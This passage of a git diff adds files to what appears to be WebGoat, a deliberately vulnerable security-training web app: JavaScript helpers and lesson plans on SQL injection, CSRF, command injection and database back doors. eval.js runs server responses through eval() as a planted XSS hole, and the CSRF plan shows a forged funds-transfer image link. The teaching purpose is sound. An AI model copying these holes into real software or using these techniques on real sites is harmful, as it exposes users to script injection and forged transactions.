+}
+
+function calcTot( price,  qty){
+	
+	return parseInt(qty * price *100)/100;
+
+}
+
+function dollarRound(price){
+	return parseInt(price *100)/100;
+}
diff --git a/main/project/WebContent/javascript/escape.js b/main/project/WebContent/javascript/escape.js
new file mode 100644
index 000000000..96a7d199d
--- /dev/null
+++ b/main/project/WebContent/javascript/escape.js
@@ -0,0 +1,6 @@
+function escapeHTML (str) {
+   var div = document.createElement('div');
+   var text = document.createTextNode(str);
+   div.appendChild(text);
+   return div.innerHTML;
+}
diff --git a/main/project/WebContent/javascript/eval.js b/main/project/WebContent/javascript/eval.js
new file mode 100644
index 000000000..69125b665
--- /dev/null
+++ b/main/project/WebContent/javascript/eval.js
@@ -0,0 +1,62 @@
+var http_request = false;
+
+function makeXHR(method, url, parameters) {
+	  //alert('url: ' + url + ' parameters: ' + parameters);
+      http_request = false;
+      if (window.XMLHttpRequest) { // Mozilla, Safari,...
+         http_request = new XMLHttpRequest();
+         if (http_request.overrideMimeType) {
+            http_request.overrideMimeType('text/html');
+         }
+      } else if (window.ActiveXObject) { // IE
+         try {
+            http_request = new ActiveXObject("Msxml2.XMLHTTP");
+         } catch (e) {
+            try {
+               http_request = new ActiveXObject("Microsoft.XMLHTTP");
+            } catch (e) {}
+         }
+      }
+      if (!http_request) {
+         alert('Cannot create XMLHTTP instance');
+         return false;
+      }
+      
+      // http_request.onreadystatechange = alertContents;
+      http_request.open(method, url, true);
+      http_request.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
+      http_request.setRequestHeader("Content-length", parameters.length);
+      http_request.setRequestHeader("Connection", "close");
+      
+      http_request.onreadystatechange = function() {
+      		if(http_request.readyState == 4) {
+      			var status = http_request.status;
+      			var responseText = http_request.responseText;
+      			
+      			//alert('status: ' + status);
+      			//alert('responseText: ' + responseText);
+      			
+      			eval(http_request.responseText);      			
+		
+      			if(responseText.indexOf("');") != -1 
+	      			&& responseText.indexOf("alert") != -1 
+	      			&& responseText.indexOf("document.cookie") != -1){
+	      			
+	      			document.form.submit();
+      			}
+      			
+      		}
+      };
+      
+      http_request.send(parameters);
+}
+
+function purchase(url) {
+	var field1 = document.form.field1.value;
+	var field2 = document.form.field2.value;
+	
+	//alert('field1: ' + field1 + ' field2: ' + field2);
+	
+	var parameters = 'field1=' + field1 + '&field2=' + field2;
+	makeXHR('POST', url, parameters);
+}
diff --git a/main/project/WebContent/javascript/instructor/DOMXSS_i.js b/main/project/WebContent/javascript/instructor/DOMXSS_i.js
new file mode 100644
index 000000000..89afd1da3
--- /dev/null
+++ b/main/project/WebContent/javascript/instructor/DOMXSS_i.js
@@ -0,0 +1,13 @@
+function displayGreeting(name) {
+	if (name != ''){
+		document.getElementById("greeting").innerHTML="Hello, " + escapeHTML(name) + "!";
+	}
+}
+
+function escapeHTML (str) {
+   var div = document.createElement('div');
+   var text = document.createTextNode(str);
+   div.appendChild(text);
+   return div.innerHTML;
+}
+	
diff --git a/main/project/WebContent/javascript/javascript.js b/main/project/WebContent/javascript/javascript.js
new file mode 100644
index 000000000..d92b9b3a1
--- /dev/null
+++ b/main/project/WebContent/javascript/javascript.js
@@ -0,0 +1,6 @@
+function MM_reloadPage(init) {  //reloads the window if Nav4 resized
+  if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) {
+    document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}
+  else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();
+}
+MM_reloadPage(true);
diff --git a/main/project/WebContent/javascript/lessonNav.js b/main/project/WebContent/javascript/lessonNav.js
new file mode 100644
index 000000000..95f4e0e3c
--- /dev/null
+++ b/main/project/WebContent/javascript/lessonNav.js
@@ -0,0 +1,59 @@
+// Logout and Help Swap Image 
+
+function MM_reloadPage(init) {  //reloads the window if Nav4 resized
+  if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) {
+    document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}
+  else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();
+}
+MM_reloadPage(true);
+
+function MM_swapImgRestore() { //v3.0
+  var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i++) x.src=x.oSrc;
+}
+
+function MM_swapImage() { //v3.0
+  var i,j=0,x,a=MM_swapImage.arguments; document.MM_sr=new Array; for(i=0;i<(a.length-2);i+=3)
+   if ((x=MM_findObj(a[i]))!=null){document.MM_sr[j++]=x; if(!x.oSrc) x.oSrc=x.src; x.src=a[i+2];}
+}
+
+// Lesson Nav bar image swapping
+
+function MM_preloadImages() { //v3.0
+  var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array();
+    var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i<a.length; i++)
+    if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}}
+}
+
+function MM_nbGroup(event, grpName) { //v6.0
+  var i,img,nbArr,args=MM_nbGroup.arguments;
+  if (event == "init" && args.length > 2) {
+    if ((img = MM_findObj(args[2])) != null && !img.MM_init) {
+      img.MM_init = true; img.MM_up = args[3]; img.MM_dn = img.src;
+      if ((nbArr = document[grpName]) == null) nbArr = document[grpName] = new Array();
+      nbArr[nbArr.length] = img;
+      for (i=4; i < args.length-1; i+=2) if ((img = MM_findObj(args[i])) != null) {
+        if (!img.MM_up) img.MM_up = img.src;
+        img.src = img.MM_dn = args[i+1];
+        nbArr[nbArr.length] = img;
+    } }
+  } else if (event == "over") {
+    document.MM_nbOver = nbArr = new Array();
+    for (i=1; i < args.length-1; i+=3) if ((img = MM_findObj(args[i])) != null) {
+      if (!img.MM_up) img.MM_up = img.src;
+      img.src = (img.MM_dn && args[i+2]) ? args[i+2] : ((args[i+1])? args[i+1] : img.MM_up);
+      nbArr[nbArr.length] = img;
+    }
+  } else if (event == "out" ) {
+    for (i=0; i < document.MM_nbOver.length; i++) {
+      img = document.MM_nbOver[i]; img.src = (img.MM_dn) ? img.MM_dn : img.MM_up; }
+  } else if (event == "down") {
+    nbArr = document[grpName];
+    if (nbArr)
+      for (i=0; i < nbArr.length; i++) { img=nbArr[i]; img.src = img.MM_up; img.MM_dn = 0; }
+    document[grpName] = nbArr = new Array();
+    for (i=2; i < args.length-1; i+=2) if ((img = MM_findObj(args[i])) != null) {
+      if (!img.MM_up) img.MM_up = img.src;
+      img.src = img.MM_dn = (args[i+1])? args[i+1] : img.MM_up;
+      nbArr[nbArr.length] = img;
+  } }
+}
\ No newline at end of file
diff --git a/main/project/WebContent/javascript/makeWindow.js b/main/project/WebContent/javascript/makeWindow.js
new file mode 100644
index 000000000..ced2494a6
--- /dev/null
+++ b/main/project/WebContent/javascript/makeWindow.js
@@ -0,0 +1,7 @@
+
+function makeWindow(url, windowName) 
+{
+	day = new Date();
+	id = day.getTime();
+	eval("page" + id + " = window.open(url, '" + id + "', 'toolbar=0,location=0,scrollbars=1,statusbar=0,menubar=0,resizable=1,width=600,height=500');");
+}
\ No newline at end of file
diff --git a/main/project/WebContent/javascript/menu_system.js b/main/project/WebContent/javascript/menu_system.js
new file mode 100644
index 000000000..a97a659bf
--- /dev/null
+++ b/main/project/WebContent/javascript/menu_system.js
@@ -0,0 +1,140 @@
+function MM_findObj(n, d) {
+  var p,i,x;  if(!d) d=document; if((p=n.indexOf("?"))>0&&parent.frames.length) {
+    d=parent.frames[n.substring(p+1)].document; n=n.substring(0,p);}
+  if(!(x=d[n])&&d.all) x=d.all[n]; for (i=0;!x&&i<d.forms.length;i++) x=d.forms[i][n];
+  for(i=0;!x&&d.layers&&i<d.layers.length;i++) x=MM_findObj(n,d.layers[i].document);
+  if(!x && d.getElementById) x=d.getElementById(n); return x;
+}
+
+function getHW(t,a) {
+  var r,p,h=0,w=0;if((p=MM_findObj(a)) !=null){
+  if(document.all || document.getElementById){h=parseInt(p.offsetHeight);w=parseInt(p.offsetWidth);
+  if(!h){h=parseInt(p.style.pixelHeight);w=parseInt(p.style.pixelWidth);}
+  }else if(document.layers){h=parseInt(p.clip.height);w=parseInt(p.clip.width);}}
+  if(t=="width"){r=w;}else{r=h;}return r; 
+}
+
+function MM1dwt() {
+  var g,lh,sw,fr = false;
+  if(!document.mc)return;
+  for(var x=0;x<m1.length;x++){tl=m1[x].id;lh="P7CM1DWT0"+tl;
+	if((g=MM_findObj(lh)) !=null){fr=true;sw=0;break;}
+	lh="P7CM1DWT1"+tl;if((g=MM_findObj(lh)) !=null){fr=true;sw=1;break;}}
+  if(fr){eval("trigMenuMagic1('"+tl+"',"+sw+")");}
+}
+
+function setMenuMagic1() {
+  var s,d,g,g2,gg,ww,kx,th,tu,ts,nu,xx,k=0,pa=0;args=setMenuMagic1.arguments;
+  if((parseInt(navigator.appVersion)>4 || navigator.userAgent.indexOf("MSIE")>-1)&& navigator.userAgent.indexOf("Opera")==-1){pa="px";}
+  if(navigator.userAgent.indexOf("Opera")>-1){P7OperaW=window.innerWidth;P7OperaH=window.innerHeight;}
+  if(!document.mc) { m3=new Array();
+   m=new Array();document.mc=true;ms=new Array();document.imswap=new Array();document.imswapo=new Array();
+   m1=new Array();m2=new Array();mprop=new Object();mprop.offset=args[0];mprop.rate=args[1];
+   mprop.delay=args[2];mprop.bottom=args[3];
+   if(document.layers){mprop.pageh = document.height;}}
+  for(var x=4;x<args.length;x+=3){if((g=MM_findObj(args[x])) !=null){
+    m[k]=args[x];g.imname=args[x+2];g.sub=args[x+1];m3[k]=0;
+    g2=MM_findObj(args[x+2]);tu=g2.src;ts=tu.lastIndexOf(".");
+    nu=tu.substring(0,ts)+"_open"+tu.substring(ts,tu.length);
+	nu2=tu.substring(0,ts)+"_over"+tu.substring(ts,tu.length);
+    document.imswap[k]=new Image();document.imswap[k].src=tu;
+	document.imswapo[k]=new Image();document.imswapo[k].src=tu;k++;}}
+  var lf=0;for (var j=0;j<m.length;j++){
+   if((g=MM_findObj(m[j])) !=null){d=(document.layers)?g:g.style;m1[j]=g;g.waiting=false;
+    if(j==0){lf=parseInt(d.left);th=parseInt(d.top);}
+    if(j>0){d.left=(lf+pa);th+=getHW('height',m[j-1]);d.top=(th+pa);}
+    if((s=MM_findObj(g.sub)) !=null){m2[j]=s;ww=getHW('width',g.sub);
+     kx=lf-ww-30;dd=(document.layers)?s:s.style;
+     dd.left=(kx+pa);dd.top=(th+pa);ms[j]=th;dd.visibility="visible";s.open=false;s.waiting=false;}}}
+  if((g=MM_findObj(mprop.bottom)) !=null){d=(document.layers)?g:g.style;
+   d.left=(lf+parseInt(args[0])+pa);th+=getHW('height',m[m.length-1]);d.top=(th+pa);}
+}
+
+function BM1(el,x,y,a,b,c,s) {
+ var g,elo=el,f="",m=false,d="";x=parseInt(x);y=parseInt(y);
+ var t = 'g.BM = setTimeout("BM1(\''+elo+'\','; 
+ if ((g=MM_findObj(el))!=null) {d=(document.layers)?g:g.style;}else{return;}
+ var xx=(parseInt(d.left))?parseInt(d.left):0;
+ var yy=(parseInt(d.top))?parseInt(d.top):0;
+ var i=parseInt(a);
+  if (eval(g.moved)){clearTimeout(g.BM);}
+  if (xx<x){xx+=i;m=true;if(xx>x){xx=x;}}
+  if (xx>x){xx-=i;m=true;if(xx<x){xx=x;}}
+  if (yy<y){yy+=i;m=true;if(yy>y){yy=y;}}
+  if (yy>y){yy-=i;m=true;if(yy<y){yy=y;}}
+ if (m) {
+  if((parseInt(navigator.appVersion)>4 || navigator.userAgent.indexOf("MSIE")>-1)&& navigator.userAgent.indexOf("Opera")==-1){   
+   xx+="px";yy+="px";}d.left=xx;d.top=yy;g.moved=true;eval(t+x+','+y+','+a+','+b+','+c+',0)",'+b+')');
+  }else {g.moved=false;wait(elo);}
+}
+
+function wait(a) {
+  var ma,mb;if((mb=MM_findObj(a)) !=null){
+   if(!mb.waiting || mb.waiting=="none"){return;}
+    ma=mb.waiting;mb.waiting=false;eval(ma);}
+}
+
+function trigMenuMagic1(a,sw) {
+  var x,g,gg,d,dd,w,lp,tp,im,im2,ts,nu,e,pa=0;if(!document.mc)return;
+  if((parseInt(navigator.appVersion)>4 || navigator.userAgent.indexOf("MSIE")>-1)&& navigator.userAgent.indexOf("Opera")==-1){pa="px";}
+  if(navigator.userAgent.indexOf("Opera")>-1){if( P7OperaW!=window.innerWidth || P7OperaH!=window.innerHeight)setMenuMagic1();}
+  var ofs=parseInt(mprop.offset),trt = parseInt(mprop.rate);
+  var tdy=parseInt(mprop.delay),tsb,tlf,tst;for(x=0;x<m.length;x++){
+  if(m[x]==a){d=m1[x];dd=(document.layers)?d:d.style;g=m2[x];gg=(document.layers)?g:g.style;
+   e=MM_findObj(d.imname);im=e.src;ts=im.replace("_open","");ts=ts.replace("_over","");
+   if(!g.open){tst="closed";im2=ts.lastIndexOf(".");
+   nu=ts.substring(0,im2)+"_open"+ts.substring(im2,ts.length);ts = nu;}else{tst="open"}break;}}
+   if(document.mm1Q){trt=20000;document.mm1Q=false;}
+  for(j=0;j<m.length;j++){
+   d=m1[j];dd=(document.layers)?d:d.style;g=m2[j];gg=(document.layers)?g:g.style;
+   if(j==0){tlf=parseInt(dd.left);}if(g.open){
+   w=getHW('width',d.sub)+30;w-=parseInt(dd.left);w*=-1;d.waiting=false;
+   eval("BM1('"+d.sub+"',"+w+","+parseInt(gg.top)+","+20000+","+tdy+",0,0)");}
+   d.waiting=false;g.open=false;
+   if(parseInt(sw)==1){e=MM_findObj(d.imname);im=e.src;im2=im.replace("_open","");e.src=im2;}}
+  var tnt=new Array();var df=0,tcd=0,tdl=m[0];for(j=0;j<m.length;j++){
+  d=m1[j];dd=(document.layers)?d:d.style;g=m2[j];gg=(document.layers)?g:g.style;
+  if(j==0){th=parseInt(dd.top);}tnt[j]=th;df=Math.abs(parseInt(dd.top)-th);
+  if(df>tcd){tdl=m[j];tcd=df;}th+=getHW('height',m[j]);
+  if(x==j && tst=="closed"){tsb=th;if(m3[j]!=1){th+=getHW('height',d.sub);}}ms[j]=th;}
+  if(tst=="closed"){d=m1[x];dd=(document.layers)?d:d.style;
+   g=m2[x];gg=(document.layers)?g:g.style;lp=tlf+ofs;
+   gg.top=(tsb+pa);ms[x]=tsb;e=MM_findObj(d.imname);if(parseInt(sw)==1){e.src=ts;}
+   g.open=true;if(m3[x]!=1){gg.visibility="visible";var r;r=MM_findObj(tdl);		
+   r.waiting="BM1('"+d.sub+"',"+lp+","+tsb+","+20000+","+tdy+",0,0)" ;}
+   }else{d=m1[m1.length-1];d.waiting="none";}
+  for(j=0;j<m.length;j++ ){eval("BM1('"+m[j]+"',"+tlf+","+tnt[j]+","+trt+","+tdy+",0,0)");}
+  if((g=MM_findObj(mprop.bottom)) !=null){d=(document.layers)?g:g.style;g.waiting=false;
+   eval("BM1('"+mprop.bottom+"',"+(tlf+ofs)+","+th+","+trt+","+tdy+",0,0)");
+   th+=(document.layers)?getHW('height',mprop.bottom):0;}
+  if(document.layers){var tw2=document.width;
+    if(document.height<th) {document.height=th;document.width=tw2;}}
+}
+
+function rollCMenu1(ev,a,b) {
+ var e,im,ts,j,nu,g,x,tev=ev.type;
+ if(!document.mc)return;
+ if(tev=="mouseover"){for(x=0;x<m.length;x++){
+ if(m[x]==a){g=m2[x];if(parseInt(b)==0 && g.open) {break;return;}
+ e=MM_findObj(m1[x].imname);im=e.src;ts=im.replace("_open","");
+ ts=ts.replace("_over","");j=ts.lastIndexOf(".");
+ e.src=ts.substring(0,j)+"_over"+ts.substring(j,ts.length);break;}}
+ }else if(tev=="mouseout"){for(x=0;x<m.length;x++){
+ if(m[x]==a){e=MM_findObj(d=m1[x].imname);im=e.src;
+ g=m2[x];ts=im.replace("_open","");ts=ts.replace("_over","");
+ if(g.open){j=ts.lastIndexOf(".");
+ nu=ts.substring(0,j)+"_open"+ts.substring(j,ts.length);
+ }else{nu=ts;}e.src=nu;break;}}}
+}
+
+function trigMM1url(param,opt){
+  var ur,x,i,nv,mn,pr=new Array();
+  ur=document.URL;x=ur.indexOf("?");
+  if(x>1){pr=ur.substring(x+1,ur.length).split("&");
+  for(i=0;i<pr.length;i++){nv=pr[i].split("=");
+  if(nv.length>0){if(unescape(nv[0])==param){
+  mn="menu"+unescape(nv[1]);
+  eval("trigMenuMagic1('"+mn+"',"+opt+")");}}}}
+  }
+  
+  document.mm1Q=true;
\ No newline at end of file
diff --git a/main/project/WebContent/javascript/sameOrigin.js b/main/project/WebContent/javascript/sameOrigin.js
new file mode 100644
index 000000000..811f95b03
--- /dev/null
+++ b/main/project/WebContent/javascript/sameOrigin.js
@@ -0,0 +1,101 @@
+
+
+
+function submitXHR(){
+
+	document.getElementById("responseTitle").innerHTML="Response: ";
+   	
+   	document.getElementById("responseArea").innerHTML=""; 
+
+	alert("creating XHR request for: " + document.getElementById("requestedURL").value);
+	
+
+	
+	try{
+		ajaxFunction();
+	}
+	catch(err){
+		alert(err);
+		document.getElementById("requestedURL").value=""; 
+	}
+}
+
+
+
+function ajaxFunction()
+  {
+	var xmlHttp;
+  try
+    {
+    // Firefox, Opera 8.0+, Safari
+    xmlHttp=new XMLHttpRequest();
+    }
+  catch (e)
+    {
+    // Internet Explorer
+    try
+      {
+      xmlHttp=new ActiveXObject("Msxml2.XMLHTTP");
+      }
+    catch (e)
+      {
+      try
+        {
+        xmlHttp=new ActiveXObject("Microsoft.XMLHTTP");
+        }
+      catch (e)
+        {
+        alert("Your browser does not support AJAX!");
+        return false;
+        }
+      }
+    }
+    xmlHttp.onreadystatechange=function()
+      {
+      
+      var result = xmlHttp.responseText;
+      if(xmlHttp.readyState==4)
+        {
+        	
+        	
+        	document.getElementById("responseTitle").innerHTML="Response from: " 
+        		+ document.getElementById("requestedURL").value ;
+        		
+        	document.getElementById("responseArea").innerHTML=result;         	
+        	
+        	document.getElementById("requestedURL").value=""; 
+        	
+        }
+      }
+      
+    xmlHttp.open("GET",document.getElementById("requestedURL").value,true);
+    xmlHttp.send(null);
+  }
+  
+  
+
+function populate(url){
+	document.getElementById("requestedURL").value=url; 
+	submitXHR();
+	
+	
+	var webGoatURL = "lessons/Ajax/sameOrigin.jsp";
+	var googleURL = "http://www.google.com/search?q=aspect+security";
+	
+	var hiddenWGStatus = document.getElementById("hiddenWGStatus");
+
+	var hiddenGoogleStatus = document.getElementById("hiddenGoogleStatus");
+	
+	
+	if (url == webGoatURL){	
+		hiddenWGStatus.value = 1;		
+	}
+	
+	if (url == googleURL){
+		hiddenGoogleStatus.value = 1;
+	}
+	
+	if (hiddenWGStatus.value == 1 && hiddenGoogleStatus.value == 1){
+		document.form.submit();
+	}
+}
\ No newline at end of file
diff --git a/main/project/WebContent/javascript/toggle.js b/main/project/WebContent/javascript/toggle.js
new file mode 100644
index 000000000..82650a3e4
--- /dev/null
+++ b/main/project/WebContent/javascript/toggle.js
@@ -0,0 +1,40 @@
+var iframe;
+
+function initIframe() {
+		var body;
+		var element;
+		
+		body = document.getElementsByTagName('body')[0];
+		element = document.getElementById('lessonPlans');
+		
+      	iframe = document.createElement('iframe');
+      	iframe.style.position = "absolute";
+      	iframe.style.visibility = "hidden";
+      	body.appendChild(iframe);
+        
+        // Configure the iFrame to border the lessonPlan
+        document.getElementsByTagName('body')[0].appendChild(element);
+        iframe.style.height = element.offsetHeight;
+        iframe.style.left = '275px';
+        iframe.style.top = '145px';
+        iframe.style.width = '474px';
+}
+        
+        
+function toggle(id) {
+		element = document.getElementById(id);
+
+        if (!element) return;
+
+        if (element.style.visibility=='visible' || element.style.visibility=='') {
+            iframe.style.visibility = 'hidden';
+            element.style.visibility = 'hidden';
+            element.style.overflow = 'hidden';
+            element.style.height='1';
+        } else {
+            iframe.style.visibility= 'visible';
+            element.style.visibility = 'visible';
+            element.style.overflow = 'visible';
+            element.style.height='';
+        }
+     }
\ No newline at end of file
diff --git a/main/project/WebContent/lesson_plans/AccessControlMatrix.html b/main/project/WebContent/lesson_plans/AccessControlMatrix.html
new file mode 100644
index 000000000..576bf3b72
--- /dev/null
+++ b/main/project/WebContent/lesson_plans/AccessControlMatrix.html
@@ -0,0 +1,9 @@
+<div align="Center">
+<p><b>Lesson Plan Title:</b> Using an Access Control Matrix</p>
+</div>
+<p><b>Concept / Topic To Teach:</b> </p>
+<!-- Start Instructions -->
+In a role-based access control scheme, a role represents a set of access permissions and privileges. A user can be assigned one or more roles. A role-based access control scheme normally consists of two parts: role permission management and role assignment. A broken role-based access control scheme might allow a user to perform accesses that are not allowed by his/her assigned roles, or somehow allow privilege escalation to an unauthorized role.  
+<p><b>General Goal(s):</b> </p>
+Each user is a member of a role that is allowed to access only certain resources. Your goal is to explore the access control rules that govern this site. Only the [Admin] group should have access to the 'Account Manager' resource.
+<!-- Stop Instructions -->
diff --git a/main/project/WebContent/lesson_plans/BackDoors.html b/main/project/WebContent/lesson_plans/BackDoors.html
new file mode 100644
index 000000000..c4ac8a08a
--- /dev/null
+++ b/main/project/WebContent/lesson_plans/BackDoors.html
@@ -0,0 +1,23 @@
+<div align="Center"> 
+<p><b>Lesson Plan Title:</b> How to Create Database Back Door Attacks.</p>
+ </div>
+ 
+<p><b>Concept / Topic To Teach:</b> </p>
+How to Create Database Back Door Attacks.
+ <br> 
+<div align="Left"> 
+<p>
+<b>How the attacks works:</b>
+</p>
+Databases are used usually as a backend for web applications. Also it is used as a media of storage. It can also
+be used as a place to store a malicious activity such as a trigger. A trigger is called by the database management
+system upon the execution of another database operation like insert, select, update or delete. An attacker for example
+can create a trigger that would set his email address instead of every new user's email address.
+</div>
+<p><b>General Goal(s):</b> </p>
+<!-- Start Instructions -->
+* Your goal should be to learn how you can exploit a vulnerable query to create a trigger.<br>
+* You will not be able to actually create one in this lesson because the underlying database engine used with WebGoat doesn't support triggers.<br>
+* Your login ID is 101. 
+<!-- Stop Instructions -->
+
diff --git a/main/project/WebContent/lesson_plans/BasicAuthentication.html b/main/project/WebContent/lesson_plans/BasicAuthentication.html
new file mode 100644
index 000000000..73a3c736d
--- /dev/null
+++ b/main/project/WebContent/lesson_plans/BasicAuthentication.html
@@ -0,0 +1,9 @@
+<div align="Center"> 
+<p><b>Lesson Plan Title:</b> Basic Authentication </p>
+</div>
+<p><b>Concept / Topic To Teach:</b></p>
+<!-- Start Instructions -->
+Basic Authentication is used to protect server side resources.  The web server will send a 401 authentication request with the response for the requested resource. The client side browser will then prompt the user for a user name and password using a browser supplied dialog box. The browser will base64 encode the user name and password and send those credentials back to the web server. The web server will then validate the credentials and return the requested resource if the credentials are correct. These credentials are automatically resent for each page protected with this mechanism without requiring the user to enter their credentials again.<br/>
+<p><b>General Goal(s):</b></p>
+For this lesson, your goal is to understand Basic Authentication and answer the questions below.
+<!-- Stop Instructions -->
diff --git a/main/project/WebContent/lesson_plans/BlindSqlInjection.html b/main/project/WebContent/lesson_plans/BlindSqlInjection.html
new file mode 100644
index 000000000..0ff76e32e
--- /dev/null
+++ b/main/project/WebContent/lesson_plans/BlindSqlInjection.html
@@ -0,0 +1,15 @@
+<div align="Center"> 
+<p><b>Lesson Plan Title:</b> How to Perform Blind SQL Injection </p>
+ </div>
+ 
+<p><b>Concept / Topic To Teach:</b> </p>
+<!-- Start Instructions -->
+SQL injection attacks represent a serious threat to any database-driven site. The methods behind an attack are easy to learn and the damage caused can range from considerable to complete system compromise. Despite these risks an incredible number of systems on the internet are susceptible to this form of attack. 
+<br>
+Not only is it a threat easily instigated, it is also a threat that, with a little common-sense and forethought, can be almost totally prevented. This lesson will show the student several examples of SQL injection.<br>
+<br>
+It is always good practice to sanitize all input data, especially data that will used in OS command, scripts, and database queries.<br>
+<!-- Stop Instructions -->
+
+<p><b>General Goal(s):</b> </p>
+The form below allows a user to enter an account number and determine if it is valid or not.  Use this form to develop a true / false test check other entries in the database.<br><br>Reference Ascii Values: 'A' = 65   'Z' = 90   'a' = 97   'z' = 122<br><br>The goal is to find the value of the first_name in table user_data for userid 15613.  Put that name in the form to pass the lesson.
diff --git a/main/project/WebContent/lesson_plans/BufferOverflow.html b/main/project/WebContent/lesson_plans/BufferOverflow.html
new file mode 100644
index 000000000..b25b4f944
--- /dev/null
+++ b/main/project/WebContent/lesson_plans/BufferOverflow.html
@@ -0,0 +1,9 @@
+<div align="Center">
+<p><b>Lesson Plan Title:</b> How to Exploit Buffer Overflows</p>
+</div>
+<!-- Start Instructions -->
+<p><b>Concept / Topic To Teach:</b> </p>
+How to Exploit Buffer Overflows.
+<p><b>General Goal(s):</b> </p>
+This lesson needs a creator!
+<!-- Stop Instructions -->
\ No newline at end of file
diff --git a/main/project/WebContent/lesson_plans/CSRF.html b/main/project/WebContent/lesson_plans/CSRF.html
new file mode 100644
index 000000000..dc17ddef9
--- /dev/null
+++ b/main/project/WebContent/lesson_plans/CSRF.html
@@ -0,0 +1,26 @@
+<div align="Center"> 
+<p><b>Lesson Plan Title:</b> How to Perform Cross Site Request Forgery. </p>
+ </div>
+ 
+<p><b>Concept / Topic To Teach:</b> </p>
+ This lesson teaches how to perform Cross Site Request Forgery (CSRF) attacks.
+ <br> 
+<div align="Left"> 
+<p>
+<b>How the attacks works:</b>
+</p>
+Cross-Site Request Forgery (CSRF/XSRF) is an attack that tricks the victim into loading a page that contains img links like the one below: 
+
+<pre>&lt;img src="<a href="http://www.mybank.com/transferFunds.do?acctId=123456" class='external free' title="http://www.mybank.com/transferFunds.do?acctId=123456" rel="nofollow">http://www.mybank.com/sendFunds.do?acctId=123456</a>"/&gt;</pre>
+
+When the victim's browser attempts to render this page, it will issue a request to www.mybank.com to the transferFunds.do page with the specified parameters. The browser will think the link is to get an image, even though it actually is a funds transfer function. 
+
+The request will include any cookies associated with the site. Therefore, if the user has authenticated to the site, and has either a permanent cookie or even a current session cookie, the site will have no way to distinguish this from a legitimate user request. 
+
+In this way, the attacker can make the victim perform actions that they didn't intend to, such as logout, purchase item, or any other function provided by the vulnerable website
+</div>
+<p><b>General Goal(s):</b> </p>
+<!-- Start Instructions -->
+Your goal is to send an email to a newsgroup that contains an image whose URL is pointing to a malicious request. Try to include a 1x1 pixel image that includes a URL. The URL should point to the CSRF lesson with an extra parameter "transferFunds=4000". You can copy the shortcut from the left hand menu by right clicking on the left hand menu and choosing copy shortcut. Whoever receives this email and happens to be authenticated at that time will have his funds transferred. When you think the attack is successful, refresh the page and you will find the green check on the left hand side menu.
+<!-- Stop Instructions -->
+
diff --git a/main/project/WebContent/lesson_plans/ChallengeScreen.html b/main/project/WebContent/lesson_plans/ChallengeScreen.html
new file mode 100644
index 000000000..b3d9b3321
--- /dev/null
+++ b/main/project/WebContent/lesson_plans/ChallengeScreen.html
@@ -0,0 +1,7 @@
+<div align="Center">
+<p><b>Lesson Plan Title:</b> Putting it all together </p>
+</div><br/>
+<p><b>Concept / Topic To Teach:</b></p>
+This lesson creates a challenge that will help the student apply all that they have learned.<br/>
+<b>General Goal(s):</b><br/>
+Display the secret message.
\ No newline at end of file
diff --git a/main/project/WebContent/lesson_plans/ClientSideFiltering.html b/main/project/WebContent/lesson_plans/ClientSideFiltering.html
new file mode 100644
index 000000000..608c360e5
--- /dev/null
+++ b/main/project/WebContent/lesson_plans/ClientSideFiltering.html
@@ -0,0 +1,12 @@
+<div align="Center">
+<p><b>Lesson Plan Title: </b>Client Side Filtering</p>
+</div>
+<p><b>Concept / Topic To Teach:</b> </p>
+<!-- Start Instructions -->
+It is always a good practice to send to the client only information which they are supposed
+to have access to.  In this lesson, too much information is being sent to the client, creating
+a serious access control problem.
+<!-- Stop Instructions -->
+<p><b>General Goal(s):</b> </p>
+For this exercise, your mission is exploit the extraneous information being returned by the
+server to discover information to which you should not have access.
\ No newline at end of file
diff --git a/main/project/WebContent/lesson_plans/ClientSideValidation.html b/main/project/WebContent/lesson_plans/ClientSideValidation.html
new file mode 100644
index 000000000..e712b6fb7
--- /dev/null
+++ b/main/project/WebContent/lesson_plans/ClientSideValidation.html
@@ -0,0 +1,15 @@
+<div align="Center">
+<p><b>Lesson Plan Title: </b>Insecure Client Storage</p>
+</div>
+<p><b>Concept / Topic To Teach:</b> </p>
+<!-- Start Instructions -->
+It is always a good practice to validate all input on the server side.  Leaving the
+mechanism for validation on the client side leaves it vulnerable to reverse
+engineering.  Remember, anything on the client side should not be
+considered a secret.
+<!-- Stop Instructions -->
+<p><b>General Goal(s):</b> </p>
+For this exercise, your mission is to discover a coupon code to receive an unintended
+discount.  Then, exploit the use of client side validation to submit an order with a
+cost of zero.
+
diff --git a/main/project/WebContent/lesson_plans/CommandInjection.html b/main/project/WebContent/lesson_plans/CommandInjection.html
new file mode 100644
index 000000000..5fbbb2d58
--- /dev/null
+++ b/main/project/WebContent/lesson_plans/CommandInjection.html
@@ -0,0 +1,11 @@
+<div align="Center"> 
+<p><b>Lesson Plan Title:</b> How to Perform Command Injection</p>
+ </div>
+<p><b>Concept / Topic To Teach:</b></p>
+<!-- Start Instructions -->
+Command&nbsp; injection attacks represent a serious threat to any parameter-driven site. The methods behind an attack are easy to learn and the damage caused can range from considerable to complete system compromise. Despite these risks an incredible number of systems on the internet are susceptible to this form of attack.<br/>
+Not only is it a threat easily instigated, it is also a threat that, with a little common-sense and forethought, can be almost totally prevented. This lesson will show the student several examples of parameter injection.<br/>
+It is always good practice to sanitize all input data, especially data that will used in OS command, scripts, and database queries.<br/>
+<!-- Stop Instructions -->
+<p><b>General Goal(s):</b></p>
+The user should be able to execute any command on the hosting OS.  
\ No newline at end of file
diff --git a/main/project/WebContent/lesson_plans/ConcurrencyCart.html b/main/project/WebContent/lesson_plans/ConcurrencyCart.html
new file mode 100644
index 000000000..4a2f44b75
--- /dev/null
+++ b/main/project/WebContent/lesson_plans/ConcurrencyCart.html
@@ -0,0 +1,22 @@
